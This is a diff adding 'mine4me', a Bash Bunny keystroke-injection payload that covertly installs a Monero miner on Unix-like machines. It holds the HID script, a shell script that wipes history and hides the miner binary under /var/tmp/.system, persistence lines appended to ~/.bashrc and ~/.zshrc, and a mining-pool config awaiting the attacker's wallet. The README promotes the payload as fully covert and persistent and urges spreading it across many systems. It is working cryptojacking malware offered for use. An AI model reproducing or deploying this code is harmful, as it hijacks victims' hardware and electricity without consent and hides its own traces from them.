diff --git a/payloads/library/execution/mine4me/README.md b/payloads/library/execution/mine4me/README.md new file mode 100644 index 00000000..6789e4ef --- /dev/null +++ b/payloads/library/execution/mine4me/README.md @@ -0,0 +1,41 @@ +## About: +* Title: mine4me +* Description: mine4me make your target's system mine Monero for you. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution +* Target: Unix-like operating systems. +* Attackmodes: HID, Storage + +## mine4me: mine4me payload makes your target system mine Monero for you. Spread payload in multiple systems to acquire more Monero. + +### Features: +* Autostart mining if Internet is connected. +* Fully covert. +* CPU/GPU mining. +* Persistent. +* Autostart payload on trigger. +* Intelligently manages processes. + +### Changes to be made in mine4me/systemIn/config.json: +* MANDATORY: Enter your wallet address on line no `136`. +* Change mining pool(Default pool: `pool.hashvault.pro:443`) on line no `135`. +* Default configuration is for CPU mining for four threads, Can be configured in Block starting from line no `28` to `111`. +* Change number of threads assigned for mining at line no `105`. +* GPU mining can be enabled if you know hardware of target's system. OpenCL/CUDA required. +* For AMD GPU replace `"enabled": false,` with `"enabled": true,` at line no `113`. +* For NVIDIA GPU replace `"enabled": false,` with `"enabled": true,` at line no `122`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payloads/switch1/ | +| mine4me/ | /payloads/library/ | + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/mine4me/mine4me/payload.sh b/payloads/library/execution/mine4me/mine4me/payload.sh new file mode 100644 index 00000000..03c0a9b0 --- /dev/null +++ b/payloads/library/execution/mine4me/mine4me/payload.sh @@ -0,0 +1,10 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/payloads/library/mine4me/systemIn /var/tmp/.system/systemIO +chmod +x /var/tmp/.system/systemIO/systemIO +cp -r $mntt/payloads/library/mine4me/shell /tmp/ +chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell diff --git a/payloads/library/execution/mine4me/mine4me/shell b/payloads/library/execution/mine4me/mine4me/shell new file mode 100644 index 00000000..0144a6dc --- /dev/null +++ b/payloads/library/execution/mine4me/mine4me/shell @@ -0,0 +1,10 @@ +#!/bin/bash +ls -a ~/ | grep 'zshrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO /dev/null &\n\tdisown\n\tclear\nfi" >> ~/.zshrc +fi + +ls -a ~/ | grep 'bashrc' &> /dev/null +if [ $? = 0 ]; then + echo -e "qwerty=\$(ps -a | grep systemIO)\nif [ \! -z \"\$qwerty\" ]; then\n\tclear\nelse\n\t/var/tmp/.system/systemIO/./systemIO /dev/null &\n\tdisown\n\tclear\nfi" >> ~/.bashrc +fi diff --git a/payloads/library/execution/mine4me/mine4me/systemIn/config.json b/payloads/library/execution/mine4me/mine4me/systemIn/config.json new file mode 100644 index 00000000..15dfee2f --- /dev/null +++ b/payloads/library/execution/mine4me/mine4me/systemIn/config.json @@ -0,0 +1,175 @@ +{ + "api": { + "id": null, + "worker-id": null + }, + "http": { + "enabled": false, + "host": "127.0.0.1", + "port": 0, + "access-token": null, + "restricted": true + }, + "autosave": true, + "background": false, + "colors": true, + "title": true, + "randomx": { + "init": -1, + "init-avx2": -1, + "mode": "auto", + "1gb-pages": false, + "rdmsr": true, + "wrmsr": true, + "cache_qos": false, + "numa": true, + "scratchpad_prefetch_mode": 1 + }, + "cpu": { + "enabled": true, + "huge-pages": true, + "huge-pages-jit": false, + "hw-aes": null, + "priority": null, + "memory-pool": false, + "yield": true, + "asm": true, + "argon2-impl": null, + "astrobwt-max-size": 550, + "astrobwt-avx2": false, + "argon2": [0, 2, 4, 6, 8, 10, 12, 14], + "astrobwt": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], + "astrobwt/v2": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], + "cn": [ + [1, 0], + [1, 2], + [1, 8], + [1, 10] + ], + "cn-heavy": [ + [1, 0], + [1, 8] + ], + "cn-lite": [ + [1, 0], + [1, 2], + [1, 4], + [1, 6], + [1, 8], + [1, 10], + [1, 12], + [1, 14] + ], + "cn-pico": [ + [2, 0], + [2, 1], + [2, 2], + [2, 3], + [2, 4], + [2, 5], + [2, 6], + [2, 7], + [2, 8], + [2, 9], + [2, 10], + [2, 11], + [2, 12], + [2, 13], + [2, 14], + [2, 15] + ], + "cn/upx2": [ + [2, 0], + [2, 1], + [2, 2], + [2, 3], + [2, 4], + [2, 5], + [2, 6], + [2, 7], + [2, 8], + [2, 9], + [2, 10], + [2, 11], + [2, 12], + [2, 13], + [2, 14], + [2, 15] + ], + "ghostrider": [ + [8, 0], + [8, 2], + [8, 8], + [8, 10] + ], + "rx": [0, 2, 8, 10], + "rx/arq": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15], + "rx/wow": [0, 2, 4, 6, 8, 10, 12, 14], + "cn-lite/0": false, + "cn/0": false, + "rx/keva": "rx/wow" + }, + "opencl": { + "enabled": false, + "cache": true, + "loader": null, + "platform": "AMD", + "adl": true, + "cn-lite/0": false, + "cn/0": false + }, + "cuda": { + "enabled": false, + "loader": null, + "nvml": true, + "cn-lite/0": false, + "cn/0": false + }, + "log-file": null, + "donate-level": 1, + "donate-over-proxy": 1, + "pools": [ + { + "algo": null, + "coin": null, + "url": "pool.hashvault.pro:443", + "user": "YOUR_WALLET_ADDRESS", + "pass": "x", + "rig-id": null, + "nicehash": false, + "keepalive": false, + "enabled": true, + "tls": false, + "wss": false, + "tls-fingerprint": null, + "daemon": false, + "socks5": null, + "self-select": null, + "submit-to-origin": false + } + ], + "retries": 5, + "retry-pause": 5, + "print-time": 60, + "health-print-time": 60, + "dmi": true, + "syslog": false, + "tls": { + "enabled": false, + "protocols": null, + "cert": null, + "cert_key": null, + "ciphers": null, + "ciphersuites": null, + "dhparam": null + }, + "dns": { + "ipv6": false, + "ttl": 30 + }, + "user-agent": null, + "verbose": 0, + "watch": true, + "pause-on-battery": false, + "pause-on-active": false +} diff --git a/payloads/library/execution/mine4me/mine4me/systemIn/systemIO b/payloads/library/execution/mine4me/mine4me/systemIn/systemIO new file mode 100644 index 00000000..4abbd706 Binary files /dev/null and b/payloads/library/execution/mine4me/mine4me/systemIn/systemIO differ diff --git a/payloads/library/execution/mine4me/payload.txt b/payloads/library/execution/mine4me/payload.txt new file mode 100644 index 00000000..a272f1f3 --- /dev/null +++ b/payloads/library/execution/mine4me/payload.txt @@ -0,0 +1,56 @@ +# Title: mine4me +# Description: mine4me makes target's system mine crypto for you. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: Unix-like operating systems. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 1400 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 200 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/library/mine4me/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 1500 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH